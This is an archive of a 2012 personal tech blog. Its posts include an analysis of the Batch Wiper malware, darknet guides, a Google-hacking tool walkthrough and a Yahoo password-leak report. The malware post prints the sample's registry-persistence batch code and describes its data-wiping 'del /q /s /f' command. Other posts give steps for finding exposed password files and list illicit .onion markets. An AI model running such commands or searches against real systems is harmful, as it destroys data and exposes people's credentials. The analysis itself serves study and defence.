Friday, December 28, 2012

A look into the Batch Wiper virus

The Iranian CERT reported the existence of a new targeted data wiping malware.
Although first thought as another serious  country level virus, further, deeper analysis show that it is relatively simple attack.

GrooveMonitor.exe is the main file.
Checking the file with a Hex Editor we notice something nice.

Basically its a self extracting RAR file.
Opening the archive we see 3 more files, jucheck.exe, juboot.exe and SLEEP.EXE.

If we look at juboot.exe in a hex editor we find the following signature

The header belongs to "the Ultimate Packer for eXecutables" (
I then opened the file with PE Explorer allowing me to see that the file is basically a Bat file with the following content:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"

It looks like justboot.exe runs sleep for 2 and then adds registry keys ensuring that 'jucheck.exe' is executed each time the computer starts up.

In the same manner, checking jucheck.exe, it is also a batch file.
The batch file is longer this time so I'll summarize it for you. I made the source is available on pastebin, .

First sleep for 2 just like with the juboot.exe
then it deletes the juboot.exe file and the original GrooveMonitor.exe
The code then checks for specific dates to run. the dates are:
  • 10-12/Dec/2012
  • 21-23/Jan/2013
  • 6-8/May/2013
  • 22-24/Jul/2013
  • 11-13/Nov/2013
  • 3-5/Feb/2014
  • 5-7/May/2014
  • 11-13/Aug/2014
  • 2-4/Feb/2015
On these dates it attempts to wipe the data on the local drive using a simple "del /q /s /f" command on drives D, E, F, G, H and I.

The batch then moves on and attempts to erase the desktop in the same way.
Finally, the batch file runs "calc" (Where did this come from ?).

I haven't finished messing with the samples but as you've seen its not a sophisticated attack and will be easy to detect and stop before any damage is done.

If you want to look at the samples for yourselves, I've made them available at


Sunday, December 23, 2012

Hack the planet

Hackers (1995)

This weekend I took the time to re-watch one of the best hacker movies that I believe to be a true classic, "Hackers". The film was released in 1995, a while back and featured a cool cast list. Check it out at
Its true that the movie is outdated and the graphical effects have nothing to do with actual hacking but, the movie has great things in it even for today's viewer.
Angelina Jolie - Hackers (1995)


Angelina Jolie as a hacker

Angelina plays "Acid Burn", an "Elite" hacker showing that women can hold their own in this world.

The warning to keep away from most common passwords.

In the movie, the first hack to the Gibson mainframe used one of the four most used passwords that were Love, Sex, Secret and God.
I'm not sure if it was true back in 1995 but according to different breaches and leaks from the past year the top passwords in 2012 are actually:
  1. password
  2. 123456 /12345678 /1234 /12345
  3. qwerty
  4. dragon
  5. baseball
  6. football
  7. letmein (one of my favorites)
  8. monkey
  9. 111111
 Please lets be a bit more creative in 2013.
 Just to further emphasize the point, a scene from another great classic Spaceballs.

Online worldwide hacking community

This is only a small part of the movie but it is very much relevant in today's world.
Locking at hacker groups and the way they operate, there is no real meaning to countries and borders. Although some hacker groups are associated with countries, there is no way to determinate the nationality or location of the members. A great example would be Anonymous, there are no real leaders and no one cause allowing anyone to join and calling upon all that can to do so.

Great One liners

Some of these really caught on.
"Mess with the best Die like the rest"
"Hacking is more than just a crime, it a survival trade"
And of course my favorite, "Hack the planet"

Have you seen the movie ?
What do you think ?

Saturday, December 15, 2012

View Twitter profile images

A while ago I've noticed that Twitter changed their design for the users images.
Previewing an image, we used to have the option to receive a picture grid of all the images the user posted however it seems that Twitter disabled the feature allowing visitors to view one image at a time.
The missing grid view is a pain and a lot of people want it back as seen in this support thread at Twitter:

So I made a decision to create an application that will let me get a profiles images easily.

The Obvious way to go about programming this is using the Twitter API (after reading the documentation of course :-) ).
I've notice two Twitter api functions that allow us to reach our goal using the plain and simple HTTP GET protocol.

1 -
The user_ timeline.xml command returns a simple XML file with the recent tweets.
The function supports additional parameters like count that allows you top specify the max amount of tweets to receive and trim_user that removes appended user data.
Xml result from the Twitter user_timeline function

Notice that for each tweet we get the tweet id and the tweet text.

2 -
The show.xml function receives a tweet id and returns the XML description.
Like most functions on twitter, the function supports additional parameters the most important one for us is the include_entities that can show us if any media links exist in the tweet allowing us to take the link and display it.
Xml result from the Twitter show function
When testing my application I found a big problem.
Twitter limits unauthenticated requests to 150 per hour and each of our GET REQUEST's counts as one. Reference 
That means we can only check under 150 tweets for images and this really limits us.
I tried registering and application with Twitter and authenticating a user for the requests but the limit seems to be final.
The only option a saw to bypass the limit is not use the Twitter API and to do some HTML scraping.

I created a simple form allowing the user to enter the twitter username he want to retrieve images of.

Once selected I used the first URL on this post figuring that for now 150 user requests per hour was enough. The result is an XML file with up to 200 status nodes.

I iterate through all of the status texts looking for links.
Twitter changes all posted links (for media files uploaded too) to the twitter format of
to check we can use a regular expression
Match m = Regex.Match(TweetText, @"(?<twitterURL><subdir>[^\s]*)");

If we found a link we cant just download since there will be a redirection from twitter to the location of the original link. In order to capture the actual image we send an HTTP HEAD request to get the redirect URL like the following:
    var request = (HttpWebRequest)WebRequest.Create(new Uri(@"" + m.Groups["subdir"].Value));
    request.Method = "HEAD";
    request.AllowAutoRedirect = false;
    string location;
    using (var response = request.GetResponse() as HttpWebResponse)  

         location = response.GetResponseHeader("Location");

Upon receiving the new location we can notice that we are not redirected to the image itself but to a web page displaying the image.

Currently I support two types of images, hosted on twitter (URL starts with and contains /photo/ ) or hosted on instagram (URL starts with
To finish our scraping session we need to find on the web page the correct image tag.
For twitter, the img tag class attribute has the value "large media-slideshow-image".
For instagram, the img tag class attribute has the value "photo".

Since all of the code up to this point was self written, I didn't want to use the HTML Agility Pack or a different third party component. So using regular expressions again I write the GetImageTags function
        private List<ImgTag> GetImageTags(String html)
            List<ImgTag> imgTags = new List<ImgTag>();
            MatchCollection m1 = Regex.Matches(html, @"(<img.*?>.*?>)", RegexOptions.Singleline);
            foreach (Match m in m1)
                string value = m.Groups[1].Value;
                ImgTag imgTag = new ImgTag();
                Match m2 = Regex.Match(value, @"src=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                    imgTag.src = m2.Groups[1].Value;                   
                m2 = Regex.Match(value, @"class=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                    imgTag.classAtt = m2.Groups[1].Value;
            return imgTags;

If we retrieve the src attribute value, all we have left to do is download the image.

You can get the Twitter image downloader application at my codeplex project page
Take a look at the source code. Recommendations and remarks welcome.

Update 29/6/2013 : I've updated the project to support the Twitter API Ver. 1.1.
That should fix the crash issue that occurred when fetching the images.

Twitter Image Downloader

Thursday, November 29, 2012

Linksys WAG160N drops connection

The Problem

I own a Linksys WAG160N modem router that I got in Singapore. I really like it since It replaces the need for two separate devices.
For the past couple of months the device used to lose connection every day. Only a restart would reset the device and allow it to make a connection. Yesterday, no matter how many times I restarted the device, I couldn't get it to connect to the internet.

The first problem with the Linksys modem was that looking at the status it seemed that the DSL connection was fine and up.
Linksys WAG160N Status screen

On to checking the log however I saw something different.
Linksys WAG160N Log screen
The Modem would try to connect and loop around "Sending PADI 1... Sending PADI 2... Sending PADI 3... Sending PADI 4... Restart adsl"

I looked around at what the PADI thing was.

PADI stands for PPPoE Active Discovery Initiation and it seems that my Modem cant really initiate.

Trying to fix

When I was checking Google for a solution, I found out that many people have the same problem. Most think the internet provider is at fault but since I hate calling tech support and usually they don't help anyway, I connected a spare modem I own using the same cables.
The new modem worked fine so this leads me to the assumption that my Modem\Router is at fault.

First thing to try is restore to Factory Defaults.
That didn't help at all I received the same results.

Next thing I tried is to upgrade to the latest firmware.
For some reason I've noticed that a lot of people looking to upgrade the firmware, couldn't find the download link, here:
The upgrade itself is pritty simple, just download the file, unzip, go to the Firmware Upgrade screen under Administration, choose the BIN file and click upgrade.

Linksys WAG160N Firmware upgrade screen
I am however sad to say, upgrading the firmware didn't help as well.

Current Solution

I had to go back to my spare Modem in order to get an internet connection however I still need to set up a network for the rest of my devices.
Hoping that the Linksys WAG160N Router part is still operational, I set up one of it's ethernet ports as a WAN port and set it up as a dialer as well.

The lucky part was I got My whole network back up. The downside is that I have two devices to connect instead of one.

Any ideas on how to fix the Linksys WAG160N Modem would be appreciated.

Friday, November 16, 2012

Capture an Entire Web Page in a C# Console Application

Its fairly simple to incorporate a browser object into your .Net Windows Forms application.
Just by adding the WebBrowser Object you get the ability to display rich HTML files or browse to websites from your application.
Most programmers also notice the DrawToBitmap functions that enables you to capture the browser window and save it as an image.

A few problems almost always arise here are their solutions:

I cant find the DrawToBitmap function in the Intelisence

DrawToBitmap is part of the WebBrowserBase class. The WebBrowser class inherits from WebBrowserBase and so inherits the DrawToBitmap function.

DrawToBitmap does not work correctly or produces a blank image

A common mistake is to write your capture code this way:

In order to capture the page one must wait for the page to load.
The way to implement is register to the WebBrowserDocumentCompletedEventHandler .
This way an event will fire when the web page will finish loading and you will be free to capture the image.

The capture doesn't capture the whole web page.

The drawToBitmap function only capturs the image displayed on the browser itself.
In order to capture the whole web page you must make sure that it is all visible.
The way I do it is by resizing the browser to match the scroll bars which almost always match the size of the page itself.

How can I capture the page with out the scroll bars

This one is a simple fix.
Just set the browsers ScrollBarsEnabled property to false.

Putting it all together, you get the following code:

Those were the basics to capture or convert a web page to an image in C# Forms but what if I want the ability to capture a web page from a console application ?

First we'll need to add some missing reference that aren't included by default:

using System.Windows.Forms;
using System.Web;
using System.Drawing;
using System.Threading; 

The next thing you'll probably notice is that when trying to run the same code that worked on a windows form you get "the current thread is not in a single-threaded apartment" exception.
A Google  search will reveal a simple solution, run the browser on a separate thread and set the threads apartment state as a single state apartment. This should stop the exception your seeing but will not fix all the problems.
The DocumentCompleted event we used will not fire up.

Since we are using an ActiveX compnent (The WebBrowser), to fix the issue,We have to create an STA thread that pumps a message loop.

 public void Capture()
            var th = new Thread(() =>
                browser = new WebBrowser();
                browser.DocumentCompleted += wb_DocumentCompleted;

To Sum it all up, I've created a project at codeplex, saving a screen capture of a webpage from a console application
Download link is:
Feel free to download the project or leave comments.

Saturday, November 10, 2012

Running a .Net 3.5 Framework on Windows 8

If you try to run a .Net 3.5 Framework application on Windows 8 you might receive an error.
When Googling, I found a fix from Microsoft (
The thing is you must enable version 3.5 on your computer to make it work and the good news its pretty simple just add it from the Control Panel.

In Control Panel, choose Programs and Features.
Choose Turn Windows features on or off.
Now select the Microsoft .NET Framework 3.5.1 check box.
Click OK, Your done.

Windows 8 Control Panel

Thursday, November 8, 2012

DarkNet - Part 3 - Installing Tor on Android

Installing Tor On Android and IOS

DarkNet - Part 3

 Installing Tor On Android

I love my Android devices and they are my constant companions. That is the reason I wanted to setup Tor on the device as well (To be specific, on my nexus 7 :-) )
You basically just need to go to the market and download 2 apps.
Orbot and Orweb.

Orbot: Tor on Android , is part of the Tor project and is the official port of Tor to the Android platform. This will set up the Tor proxy chain for you. All you need to do is press for a few seconds on the big power icon in the center of the screen, until it turns green.

It does include a few settings that you can play with to set it up to work with all your apps and services (via transparent proxy) but you need to have a rooted device with Superuser privileges.

If you don't have root, you'll need to work with Orbot-enabled apps like Firefox or I personally recommend Orweb.

Orweb is a specialized browser to be used with Orbot.
The best thing about it is that it is pre-configured to work with Orbot.
Once Orbot is running all you need to do is run Orweb and you set to venture into the DarkNet.

 Installing Tor On IOS

Now I have to give credit to Apple. They make great stuff and have a lot of great developers supporting them.
One of the developers is Mike Tigas.
Mike developed "Onion Browser" which can be found on iTunes for 0.99$
Whats cool about the app is that it combines both the browser and the Tor network setup so you don't really have to do anything else.

Its really that simple, Check it out.

Check out more posts about the DarkNet from the main post

Wednesday, October 31, 2012

DarkNet - Part 2 - The Tor DarkNet

The Tor DarkNet

DarkNet - Part 2

Tor (The Onion Router) is a system intended to enable anonymity online. The idea is to bounce our internet traffic through a worldwide volunteer network of servers to conceal a our location or usage from everyone.

From Wikipedia: "Onion Routing refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and, ultimately, its destination. This reduces the possibility of the original data being unscrambled or understood in transit."

The Tor project was originally developed for the U.S.Navy with the purpose of securing communications over the internet. Today, Tor is used for a wide variety of purposes by regular people, the military, journalists, law enforcement officers, activists, and many others in order to keep their activities private, to stop websites from tracking them or visit sites that are blocked by their local Internet providers.

Tor also offers the Hidden Services which basically make it possible for users to hide their locations while offering various content. This content will, however, only be available to other Tor users. This way both Content owner and people browsing are protected. This is a good way to bypass censorship in countries that monitor and limit internet users.

I wont bore you with more details on why we need TOR, why its a good solutions and i wont go into all the technical details about how the network works. you can read more about the Tor project in their web site :

So lets get it set up

Although the first versions of TOR weren't the simplest to set up and use, for most mainstream uses today's versions are as simple as download and click.

Just go to the Tor Project download page:
and download the Tor Browser Bundle.
The good thing about the Tor Browser Bundle it that it lets you use Tor without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser to protect your anonymity, and is self-contained. Great !
If you choose to, you can still create you own setup by downloading relevant projects from the software and services page.

After downloading the bundle just double click on Start Tor Browsere.exe

It will initialize Tor by running the Vidalia program.
Once set up the Tor Browser will open and you are free to start browsing.

Notice that although resembling the firefox browser it is limited.
No plugins are loaded since plugins such as Flash, RealPlayer, Quicktime, and others can be manipulated into revealing your IP address.

Now that we have Tor running we can browse sites securely But this is not the point of this post. We want to check out the Tor Hidden Services which is the Tor Darknet.

the hidden services sites use the .onion domain suffix which acts just like a top level domain (.com, .org, .net, etc), but is not accessible like a normal webpage. Another thing you should notice about the .onion urls is that they are randomly generated and do not make out anything, so in order to find a site you need to know the exact address.
An example is the url http://idnxcnkne4qt76tg.onion/ which is not accessible in you normal browser but using the Tor browser you reach the Tor Project website in the Darknet, but thats not the point.

For content you cant see in the "normal" internet you need to have prior knowledge of the DarkNet, I compiled a few links.

http://kpvz7ki2v5agwt35.onion - The Hidden Wiki - a great place to start that contains a lot of information on .onion sites including more links.

http://xmh57jrzrnw6insl.onion/ - TORCH, a tor search engine that claims to index over a million pages.

http://dppmfxaacucguzpc.onion/ - TorDir, a great tor services directory to get you started.

http://silkroadvb5piz3r.onion/ - The Silk Road - a marketplace where you can find almost anything to buy. In order to make an order however you need to get bitcoins.

Other services that are provided that aren't simple websites:
Tor Mail is a Tor Hidden Service that allows you to send and receive email anonymously, even to addresses outside Tor. Your mail address will be

http://4eiruntyxxbgfv7o.onion - Circle, used to be just TorPM for secure Messaging now they offer a few more cool services.

That should be enough to get you started, feel free to add more cool .onion links in the comments.

If you're just curious about the DarkNet and just want to take a quick peek, you can use as a proxy from normal web to the DarkNet without needing Tor itself. Take the .onion link you want to visit and append .to to the domain. Its that simple.
Keep in mind that using does not protect your privacy and that your actions will be in the open.

Check out more posts about the DarkNet from the main post

Or continue to "Installing TOR on Android and IOS" :

Monday, October 29, 2012

Let Me Google That For You

Ever had friends ask to check something for them on the internet?
Didn't you find yourself thinking, Why cant they just google that for themselves ?

Well I found a site that helps in just that case, Let Me Google That For You web site.
The url is:

You can either send the site to your friend or just send him the link generated by the site, your friend should get the point :-)

Saturday, October 27, 2012

Darknet - Part 1 - What is Darknet ?

For some reason the Darknet has become very popular in the past months. I've been getting a lot of questions at work about it so I decided to create a 2 part starter about the Darknet.

What is Darknet ?

To put it plainly, we're talking about an internet beyond what you normally have access to.
With many different names,  "The darkweb", "invisible web", "dark address space", "the deep web", "beneath the surface web" they all refer to the same thing, beyond the standard, media supported, google, bing and yahoo indexed internet exist a less known, harder to reach section of the internet.

Some estimate that the Dark Web is several orders of magnitude larger than the surface of the Web but I think that we need to differentiate between sections of the internet that are unreachable to most users, like private intranets or clouds and Darknet.

Whats on the Darknet ? Why do we need it ?

The Darknet was made to be anonymous for the user accessing content and the host serving it. Basically you could put any content you like on it, like cnn but why would you ?  You could just go there on the normal internet.
So what can you find on the Darknet ? Porn, Hacked programs, movies, mp3's, Forums, Blogs and more.

Is it legal ?

Yes. The darknet itself and accessing it is legal.
The problem is more what you do with it and some of the content on the Darknet.
The Darknet is a safe haven for pedophiles since they can anonymously post, download and share anything.
There are also sites offering to sell illegal drugs, guns, ammunition and even hits.
Some great forums for "computer security experts" can also be found on the Darknet.
You can basically find anything  you want since you are free to anonymously host and browse the content without having to worry about the local law enforcer since they cant identify the servers or their users.

Why not disable the Darknet ?
Well there are also a few good uses to the Darknet. Imagine a place were one has a complete freedom of speech without having to worry about the oppressing government like in China and Iran. These countries are the ones trying to stop access to the Darknet for fear of uprisings against them.

How do I reach Darknet ?

There is no one Darknet, it an idea. There are a few "Dark" networks out there I'll show you the Tor Project "Dark net" and the I2P2 Network in the following parts.
So check back soon

DarkNet article parts

   Part 1 - What is Darknet ?
   Part 2 - The Tor DarkNet -
    Part 3 - Installing Tor -

Saturday, October 13, 2012

Error installing Sql server 2008 R2

I've just spent the past few hours trying to install SQL Server Express 2008 R2 on a Windows 7 Machine for work. Just setting up the install took Microsoft SQL Server 15 Min. (i3 laptop 2G Memory).

Every try, I kept getting an  "An error occurred creating the configuration section handler for userSettings/Microsoft.SqlServer.Configuration.LandingPage.Properties.Settings: Could not load file or assembly 'System, Version=4.0.0."

Of course I tried installing as Administrator and clearing temp directory and reinstalling.
After that failed, I updated the system with windows update and retried the former. Nothing worked.

At last I found a blog post with a simple solution at

All it said was "Solution: surprisingly easy just press Continue!"

I did and the installation worked, couldn't believe I was so stupid.
Full credit to Edward Wilde.

Friday, October 5, 2012

Facebook is annoying

I just read a nice post from Saman Shad published on the Guardian web site I thought I would share, "Facebook, can I share something with you? It's about our relationship, No wonder people are turned off these days. You've turned us into narcissists – narcissists you only want to make a buck from".
Article link:

The comment raises some good points that I agree with.

"It's getting complicated, Facebook. A billion of us use you, but we are getting increasingly frustrated with you. It's us, not you. You've made us change, and not in a good way."

Saman is right, we only used to update our status and post the occasional photo but now, we share too many things that are, sometimes, used without our direct authorization and knowledge or even against us. Furthermore we spend too much time on Facebook.

"And then there is you. Finding more and more ways to use information you collect about us to make money. Lots and lots of money."

Well what do you expect from a company? They are trying to raise their profit on the backs of the users. It's perfectly legal and makes good business sense. It does however leave us feeling a bit exploited. Maybe we would be more understanding of them, using our lives for profit, if we were receiving a fair share or at least make us feel as if we are part of the company.

"Ah, who are we kidding? It's not like you're listening. You stopped listening a long time ago. It's why your users are becoming frustrated."

Yes. Facebook is annoying, they stopped listening to the users because they have over a billion of them !!!!
To top it off, there is no way to get away from it. We're hooked !

I really want to find a different platform to use but when most (99%) of the people use Facebook, its really really hard to leave.
I keep posting thinks on my Google+ but there is no one to read / comment / share forcing me back to Facebook to get some attention.

Now to finish this post, some lol cats, feel free to share ;-)

Monday, October 1, 2012

Asus Galexy Nexus 7

For the past month I've been playing with what became my favorite gadget the Nexus 7.

The first thing you notice about the Nexus 7 is the size of course.
Below are comparison images with the HTC Desire phone, An iPad, and the Nexus 7.
The image on the left also has a standard 15.6" Lenovo laptop.

For me the 7" size was a new concept that took me under 10 minutes to get the hang of and now I simply love it.

I did ask myself. Do we really need a new form factor like the nexus and today I'm ready to say of course we do.
The laptop was used as a living room browser but when I got my first iPad, it quickly became what is was meant to be, a mobile computer for when i go to conferences or make presentations.
I used to then carry my iPad wherever I went since it was much better than my mobile phone for browsing the net when waiting for the doctor or for playing the casual game on the go. But now with the nexus 7, the iPad stays at home. It is still great for browsing the net from the living room instead of opening my laptop but the Nexus 7 is much more mobile and light weight so it replaced the iPad when outside the house.

A while back I reviewed the Motorola Xoom Android tablet and really wasn't very enthusiastic about it for the regular user but the Nexus 7 with the new Android 4.1 (Jelly Bean) will fit most users and be great for google users.

The tablet runs smoothly with great performance thanks to its Nvidia quad-core processor.
Now although there are some devices out there with better specs (like the Asus Transformer pad TF700 that I'm dying to get my hands on) the price tag on the Nexus 7 currently pushes it to the top.

Now there are a few disappointments with the Nexus 7. The ones that bothered me the most are that there is only one front facing camera, there is no SD card expansion, no 3G version and the sound levels from the speaker are low.
A friend from Google explained that the decision to go with a limited device was to keep the device costs at a minimum.

Another thing i was disappointed about was the removal of flash support and I really don't understand why there wasn't a pre-installed camera app on the device (I installed "Camera Launcher for Nexus 7").

All things considered this is a great device.

Monday, August 13, 2012

War Games

Just saw the old movie War Games from 1983.

I think it was one of the first films were I saw someone "Hack" a system.
Check out the size of the floppy disk he's using :-)

I Love this movie. What do you think ?

Saturday, August 11, 2012

Google Hacking Diggity Project

I was in DEFCON 20 a couple of weeks ago and was introduced to a few cool applications and I thought I should share them so I'll be posting making some posts introducing them the following weeks.

Today I want to introduce the Google Hacking Diggity Project,
Probably everyone reading this post  already knows about Google hacking (if not, start with, fast) but it is so much nicer to have one tool that will build all your queries for you.
Now despite the name, they do more than google.

Francis Brown and Rob Ragan have developed a search engine hacking tool arsenal that leverages Google, Bing and Shodan to quickly identify vulnerable systems or sensitive data leaks from corporate networks.

To start all you need to do is go to the link mentioned above and download search diggity from the attack tools menu.

some cool features include PortScan

NotInMyBackyard is becoming one of my favorites, allowing to search for passwords or sensitive information intentionally or recklessly posted on the net. The tool comes with pre-built queries that make it really easy to find information on pastebin, youtube, twitter, dropbox, googledocs and more.

Just try :
  1. type 'password' in the Query appender
  2. select from the locations list (inside cloud storage).
  3. from the extensions section choose XLS and XLSX
  4. look at all the documents you can find.

Try different settings for better results.

Thursday, July 12, 2012

Yahoo! Voices accounts hacked

Yahoo! Voices is Yahoo!’s online publishing and Contributor Network.Yahoo-Voices-logo

It seems that the Yahoo! service was vulnerable to a simple database attack that leaked 453,000 unencrypted account passwords online.
The hackers, an unknown crew called D33Ds, claimed they used a union-based SQL injection technique to break into the Yahoo sub domain. They named it as a “Wake-Up call.”

I’m really surprised that why Yahoo! Voices was storing unencrypted passwords in its database unsalted one-way encrypted hashes would have been bad enough. I’m not sure if this Wake-Up call is going to work since a former call was done only last month when LinkedIn unsalted password were leaked too.

A document containing the lifted SQL structures, software variables, usernames and cleartext passwords is published on the hackers website.
The link is:

Statistics on the passwords are already available:

Total entries = 442773
Total unique entries = 342478

Top 10 passwords
123456 = 1666 (0.38%)
password = 780 (0.18%)
welcome = 436 (0.1%)
ninja = 333 (0.08%)
abc123 = 250 (0.06%)
123456789 = 222 (0.05%)
12345678 = 208 (0.05%)
sunshine = 205 (0.05%)
princess = 202 (0.05%)
qwerty = 172 (0.04%)

Top 10 base words
password = 1373 (0.31%)
welcome = 534 (0.12%)
qwerty = 464 (0.1%)
monkey = 430 (0.1%)
jesus = 429 (0.1%)
love = 421 (0.1%)
money = 407 (0.09%)
freedom = 385 (0.09%)
ninja = 380 (0.09%)
writer = 367 (0.08%)
Developers, Please take security seriously.
Everybody, Time to change our passwords.

Monday, July 9, 2012

Monday, July 2, 2012

Antec p182 front port assembly

Two or three years ago I bought an Antec P182 case. I love the case, its extra quiet, loads of space for all my drives and looks great.
The thing is after 2 years of use the USB port on the front panel broke. After checking the issue on google I had to conclude, Antec used cheap parts for the USB port.
Many P182 owners had the same problem.
I also couldn't just jump to an electronics store to replace the USB port, I had to replace the whole front port assembly since all the front ports are molded together.
Looking for replacement parts, it seemed that they were all sold out.
Even Antec support couldn't find one.

Then about 9 months after my correspondence with Antec support I got a mail informing me that they have the part available for purchase (thanks Jie Zhang) and i finally tried to install it this weekend.

When trying to remove the old front port, I couldn't reach the screws.
Now I know my cabeling is awful but it seemed that I was missing something, And yes I removed the case cages.

Luckily  I found this great video showing how to replace the front port assembly, by Puget Systems on YouTube.

Finally my case is as good as new :-)